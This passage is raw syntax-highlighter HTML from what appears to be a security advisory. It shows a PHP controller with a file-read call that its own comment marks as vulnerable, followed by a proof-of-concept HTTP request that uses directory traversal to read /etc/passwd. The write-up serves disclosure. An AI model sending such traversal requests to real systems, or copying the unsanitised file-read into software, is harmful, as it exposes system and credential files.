data-line=\"crayon-58867eb52c074951174095-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-42\">42<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-1\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;data&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-2\"><span class=\"crayon-c\">\/\/vim: ts=2 sw=2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-4\"><span class=\"crayon-k\">include_once<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;db.php&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-5\"><span class=\"crayon-k\">include_once<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;base_controller.php&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-7\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GrdataController<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">extends<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BaseController<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">signinRequired<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-k\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">doAjaxGet<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-14\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$_SESSION<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;curGrPath&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-15\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">isReadable<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-16\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;permission denied&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-17\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/\/ $_SESSION[&#8216;flash&#8217;] = &#8220;permission denied&#8221;;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-18\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-c\">\/\/ $this-&gt;redirect($this-&gt;makeUrl(&#8220;app\/landing_page.php&#8221;));<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-19\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-21\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$grName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-22\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_get_contents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;.\/grdata\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$grName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/vuln call to file_get_contents()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-23\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-24\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;data&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$file<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-25\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">curUser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-26\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;actionPermitted&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">can<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;write&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grName&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;true&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;false&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-27\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">isAdmin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-28\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;grBlackList&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">implode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;,&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">grBlackList<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-29\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;home_page&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$u<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;home_page&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-30\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxSuccess<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-31\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-32\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-33\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">$this<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">renderAjaxError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$response<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;failed to read data file: $grName&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-34\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-36\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-38\"><span class=\"crayon-v\">$controller<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GrdataController<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-39\"><span class=\"crayon-v\">$controller<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c074951174095-41\"><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c074951174095-42\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;actionPermitted&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;home_page&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0059 seconds] -->  <\/p>\n<p><u><em>Proof of Concept<\/em><\/u><\/p>\n<p>An attacker sending the following request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c078469555230\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/sdcard\/cpt\/app\/grdata.php?grName=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1  Host: 192.168.0.16  Accept: application\/json, text\/javascript, *\/*; q=0.01  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/49.0.2623.75 Safari\/537.36  Referer: http:\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr  Accept-Encoding: gzip, deflate, sdch  Accept-Language: en-US,en;q=0.8  Cookie: PHPSESSID=7384531ce6f444710b42106a07b91e4c; PHPSESSID=7384531ce6f444710b42106a07b91e4c  Connection: close<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c078469555230-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c078469555230-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sdcard<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cpt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">grdata<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">grName<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">passwd <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.0.16<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-3\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">javascript<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.01<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-4\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AppleWebKit<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">KHTML<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">49.0.2623.75<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Safari<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" 